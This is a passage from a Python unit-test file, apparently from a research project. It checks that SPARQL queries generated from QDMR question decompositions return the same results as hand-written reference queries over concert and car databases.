?singer_1 arc:singer:Name ?Name_1.
FILTER(?Age_1 = ?min).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "filter"], [["names"], ["#1", "the youngest"]])
grounding = { GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,1,"the youngest") : GroundingKey.make_comparative_grounding("min", None, GroundingKey.make_column_grounding("singer", "Age")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSelectProjectComparative(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_another_column_compare_value(self):
"""Select table, filter values based on a value in another column based on project-comparative
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
FILTER(?countries != "France"^^xsd:string)
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "project", "comparative"], [["names"], ["countries", "#1"], ["#1", "#2", "not from France"]])
grounding = { GroundingIndex(1,0,"countries") : GroundingKey.make_column_grounding("singer", "Country"),
GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(2,2,"not from France"): GroundingKey.make_comparative_grounding("!=", "France"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_compare_with_another_column(self):
"""Select table, filter values based on a value in another column based on project-comparative
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Country
WHERE
{
?singer arc:singer:Country ?Country.
?singer arc:singer:Name ?Name.
?singer arc:singer:Age ?Age.
FILTER(?Age > 32).
}
GROUP BY ?Country""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = QdmrInstance(["select", "project", "comparative"], [["countries"], ["names", "#1"], ["#1", "#2", "older than 32"]])
grounding = { GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country"),
GroundingIndex(1,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(2,2,"older than 32"): GroundingKey.make_comparative_grounding(">", "32", GroundingKey.make_column_grounding("singer", "Age")),
"distinct": ["#1"],
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_another_column_compare_value_in_the_third_column(self):
"""Select table, filter values based on a value in another column based on project-comparative.
The argument of comparative contains QDMR reference.
"""
rdf_graph, schema = get_graph_and_schema("dev", "car_1")
correct_sparql_query = textwrap.dedent("""\
SELECT ?ID
WHERE
{
?ID arc:cars_data:Weight ?Weight.
?ID arc:cars_data:Year ?Year.
FILTER(?Year > ?Weight).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_table_grounding("cars_data"), schema)])
qdmr = QdmrInstance(["select", "project", "project", "comparative"],
[["cars"], ["years", "#1"], ["weights", "#1"], ["#1", "#2", "larger than #3"]])
grounding = {
GroundingIndex(0,0,"cars") : GroundingKey.make_table_grounding("cars_data"),
GroundingIndex(1,0,"years") : GroundingKey.make_column_grounding("cars_data", "Year"),
GroundingIndex(2,0,"weights") : GroundingKey.make_column_grounding("cars_data", "Weight"),
GroundingIndex(3,2,"larger than #3"): GroundingKey.make_comparative_grounding(">", "#3"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestDistinct(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_distinct(self):
"""When selecting the column we return the items of that column, adding the distinct flag
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?countries
WHERE
{
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = QdmrInstance(["select"],
[["countries"]])
grounding = {GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country")}
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_distinct_count(self):
"""Select table, filter values based on a value in another column based on project-comparative
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT (count(DISTINCT ?countries) AS ?count)
WHERE
{
?singer arc:singer:Country ?countries.
}""")
output_col = OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(output_col, "count")])
qdmr = QdmrInstance(["select", "aggregate"],
[["countries"], ["count", '#1']])
grounding = {GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country")}
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_distinct(self):
"""When selecting the column we return the items of that column, adding the distinct flag of the project operator with empty grounding
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?countries
WHERE
{
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = QdmrInstance(["select", "project"],
[["countries"], ["distinct of", "#1"]])
grounding = {GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country")}
grounding["distinct"] = ["#2"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestEmptySubqueries(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_filter_empty_result(self):
"""Test projecting the empty output of a subquery
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?stadiums arc:stadium:Capacity ?Capacity.
FILTER(?Capacity < 0)
?stadiums arc:stadium:Name ?Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Name"))])
qdmr = QdmrInstance(["select", "filter", "project"],
[["stadiums"], ["#1", "cap < 0"], ["name", "#2"]])
grounding = {GroundingIndex(0,0,"stadiums") : GroundingKey.make_table_grounding("stadium"),
GroundingIndex(1,1,"cap < 0") : GroundingKey.make_comparative_grounding("<", "0",
GroundingKey.make_column_grounding("stadium", "Capacity")),
GroundingIndex(2,0,"name") : GroundingKey.make_column_grounding("stadium", "Name")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestRefGrounding(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_ref_grounding_comparative(self):
"""Test adding ref grounding in the third arg of COMPARATIVE (2nd arg of FILTER)
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?stadiums arc:stadium:Capacity ?Capacity.
FILTER(?Capacity < 5000)
?stadiums arc:stadium:Name ?Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Name"))])
qdmr = QdmrInstance(["select", "project", "filter", "project"],
[["stadiums"], ["capacity", "#1"], ["#2", "cap < 5000"], ["name", "#3"]])
grounding = {GroundingIndex(0,0,"stadiums") : GroundingKey.make_table_grounding("stadium"),
GroundingIndex(1,0,"capacity") : GroundingKey.make_column_grounding("stadium", "Capacity"),
GroundingIndex(2,1,"cap < 5000") : GroundingKey.make_comparative_grounding("<", "5000",
GroundingKey.make_reference_grounding("#2")),
GroundingIndex(3,0,"name") : GroundingKey.make_column_grounding("stadium", "Name")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_ref_grounding_group(self):
"""Test adding ref grounding in the third arg of COMPARATIVE (2nd arg of FILTER)
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Capacity
WHERE
{
?stadiums arc:stadium:Capacity ?Capacity.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Capacity"))])
qdmr = QdmrInstance(["select", "project", "group"],
[["stadiums"], ["capacity", "#1"], ["sum", "#2", "#1"]])
grounding = {GroundingIndex(0,0,"stadiums") : GroundingKey.make_table_grounding("stadium"),
GroundingIndex(1,0,"capacity") : GroundingKey.make_column_grounding("stadium", "Capacity"),
GroundingIndex(2,0,"sum") : GroundingKey.make_reference_grounding("#2"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestNonInjectiveLink(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_project_forward(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?singer_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "project"], [["concert"], ["singer", "#1"]])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"singer") : GroundingKey.make_column_grounding("singer", "Name"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_project_forward_distinct(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?singer_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "project"], [["concert"], ["singer", "#1"]])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"singer") : GroundingKey.make_column_grounding("singer", "Name"),
"distinct": ["#2"]
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_project_backward(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name"))])
qdmr = QdmrInstance(["select", "project"], [["singer"], ["concert", "#1"]])
grounding = { GroundingIndex(0,0,"singer") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,0,"concert") : GroundingKey.make_column_grounding("concert", "concert_Name"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_with_intersect(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?singer_name
WHERE
{
?s_id arc:singer:Name ?singer_name.
{
SELECT ?singer_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
FILTER(?concert_name = "Super bootcamp"^^xsd:string)
}
}
{
SELECT ?singer_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
FILTER(?concert_name = "Week 1"^^xsd:string)
}
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "filter", "filter", "intersection"],
[["singer"], ["#1", "concert name Super bootcamp"], ["#1", "concert name Week 1"], ["#1", "#2", "#3"]])
grounding = { GroundingIndex(0,0,"singer") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,2,"concert name Super bootcamp") : GroundingKey.make_comparative_grounding("=", "Super bootcamp", GroundingKey.make_column_grounding("concert", "concert_Name")),
GroundingIndex(2,2,"concert name Week 1") : GroundingKey.make_comparative_grounding("=", "Week 1", GroundingKey.make_column_grounding("concert", "concert_Name")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestUnionAsArg(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_union_of_horizontal_unions(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?c_id ?concert_name ?Theme ?Stadium_ID ?Year
WHERE
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Stadium_ID ?Stadium_ID.
?c_id arc:concert:Year ?Year.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Stadium_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Year"))])
qdmr = QdmrInstance(["select", "project", "project", "project", "project", "union", "union", "union"],
[["concert"],
["concert_Name", "#1"],
["Theme", "#1"],
["Stadium_ID", "#1"],
["Year", "#1"],
["#1", "#2"],
["#3", "#4", "#5"],
["#6", "#7"],
])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_table_grounding("concert"),
GroundingIndex(1,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(2,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(3,0,"Stadium_ID") : GroundingKey.make_column_grounding("concert", "Stadium_ID"),
GroundingIndex(4,0,"Year") : GroundingKey.make_column_grounding("concert", "Year"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_union_of_vertical_unions(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_name ?Theme
WHERE
{
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Year ?Year.
FILTER(?Year = 2014).
}
UNION
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Year ?Year.
FILTER(?Year = 2015).
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme"))])
qdmr = QdmrInstance(["select", "project", "project", "union", "comparative", "comparative", "union"],
[["concert"],
["concert_Name", "#1"],
["Theme", "#1"],
["#2", "#3"],
["#4", "#4", "in 2014"],
["#4", "#4", "in 2015"],
["#5", "#6"],
])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_table_grounding("concert"),
GroundingIndex(1,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(2,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(4,2,"in 2014") : GroundingKey.make_comparative_grounding("=", "2014", GroundingKey.make_column_grounding("concert", "Year")),
GroundingIndex(5,2,"in 2015") : GroundingKey.make_comparative_grounding("=", "2015", GroundingKey.make_column_grounding("concert", "Year")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_comparative_after_union(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_name ?Theme
WHERE
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Year ?Year.
FILTER(?Year = 2014).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme")),
])
qdmr = QdmrInstance(["select", "project", "union", "comparative"],
[["concert_Name"],
["Theme", "#1"],
["#1", "#2"],
["#3", "#3", "in 2014"],
])
grounding = { GroundingIndex(0,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(3,2,"in 2014") : GroundingKey.make_comparative_grounding("=", "2014", GroundingKey.make_column_grounding("concert", "Year")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_intersection_after_union(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_name ?Theme
WHERE
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Year ?Year.
FILTER(?Year = 2014).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme")),
])
qdmr = QdmrInstance(["select", "project", "union", "comparative", "intersection"],
[["concert_Name"],
["Theme", "#1"],
["#1", "#2"],
["#3", "#3", "in 2014"],
["#3", "#4", "#4"]
])
grounding = { GroundingIndex(0,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(3,2,"in 2014") : GroundingKey.make_comparative_grounding("=", "2014", GroundingKey.make_column_grounding("concert", "Year")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSqlWithStar(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_sql_with_star(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
sql_query = "SELECT * FROM concert join stadium on concert.stadium_id = stadium.Stadium_ID"
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert ?concert_Name ?Theme ?Stadium_ID ?Year ?stadium ?Location ?Name ?Capacity ?Highest ?Lowest ?Average
WHERE
{
?concert arc:concert:concert_ID ?concert.
?concert arc:concert:concert_Name ?concert_Name.
?concert arc:concert:Theme ?Theme.
?concert arc:concert:Stadium_ID ?Stadium_ID.
?concert arc:concert:Year ?Year.
?Stadium_ID arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium.
?stadium arc:stadium:Stadium_ID ?stadium.
?stadium arc:stadium:Location ?Location.
?stadium arc:stadium:Name ?Name.
?stadium arc:stadium:Capacity ?Capacity.
?stadium arc:stadium:Highest ?Highest.
?stadium arc:stadium:Lowest ?Lowest.
?stadium arc:stadium:Average ?Average.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Stadium_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Year")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Stadium_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Location")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Capacity")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Highest")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Lowest")),
